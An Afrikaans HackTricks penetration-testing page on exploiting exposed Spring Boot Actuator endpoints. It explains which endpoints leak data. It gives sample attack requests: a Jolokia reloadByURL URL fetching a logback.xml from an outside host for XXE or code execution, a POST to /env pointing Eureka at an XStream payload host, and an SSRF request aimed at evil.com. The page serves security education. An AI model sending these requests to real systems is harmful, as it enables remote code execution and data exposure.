Spring Actuators

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Spring Auth Bypass

Van https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Exploiting Spring Boot Actuators

Kyk na die oorspronklike pos van [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Belangrike Punten:

Spring Boot Actuators registreer eindpunte soos /health, /trace, /beans, /env, ens. In weergawes 1 tot 1.4, is hierdie eindpunte toeganklik sonder verifikasie. Vanaf weergawe 1.5 is slegs /health en /info nie-sensitief per standaard, maar ontwikkelaars deesdae dikwels hierdie sekuriteit deaktiveer.
Sekere Actuator eindpunte kan sensitiewe data blootstel of skadelike aksies toelaat:
/dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, en /heapdump.
In Spring Boot 1.x, word actuators geregistreer onder die wortel-URL, terwyl dit in 2.x onder die /actuator/ basis pad is.

Eksploitasiemetodes:

Afgeleë Kode-uitvoering via '/jolokia':

Die /jolokia actuator eindpunt blootstel die Jolokia Biblioteek, wat HTTP-toegang tot MBeans toelaat.
Die reloadByURL aksie kan uitgebuit word om logging konfigurasies van 'n eksterne URL te herlaai, wat kan lei tot blinde XXE of Afgeleë Kode-uitvoering via vervaardigde XML konfigurasies.
Voorbeeld van 'n eksploit URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

Konfigurasie-wijziging via '/env':

As Spring Cloud Biblioteke teenwoordig is, laat die /env eindpunt die wijziging van omgewings eienskappe toe.
Eienskappe kan gemanipuleer word om kwesbaarhede uit te buit, soos die XStream deserialisering kwesbaarheid in die Eureka serviceURL.
Voorbeeld van 'n eksploit POST versoek:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

Ander Nuttige Instellings:

Eienskappe soos spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, en spring.datasource.tomcat.max-active kan gemanipuleer word vir verskeie eksploit, soos SQL-inspuiting of die verandering van databasisverbindingstrings.

Addisionele Inligting:

'n Omvattende lys van standaard actuators kan hier gevind word.
Die /env eindpunt in Spring Boot 2.x gebruik JSON-formaat vir eiendom wijziging, maar die algemene konsep bly dieselfde.

Verwante Onderwerpe:

Env + H2 RCE:

Besonderhede oor die uitbuiting van die kombinasie van /env eindpunt en H2 databasis kan hier gevind word.

SSRF op Spring Boot Deur Onkorrekte Padnaam Interpretasie:

Die Spring raamwerk se hantering van matriksparameters (;) in HTTP padname kan uitgebuit word vir Server-Side Request Forgery (SSRF).
Voorbeeld van 'n eksploit versoek:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

Support HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousSource code Review / SAST Tools NextSymfony

Last updated 4 months ago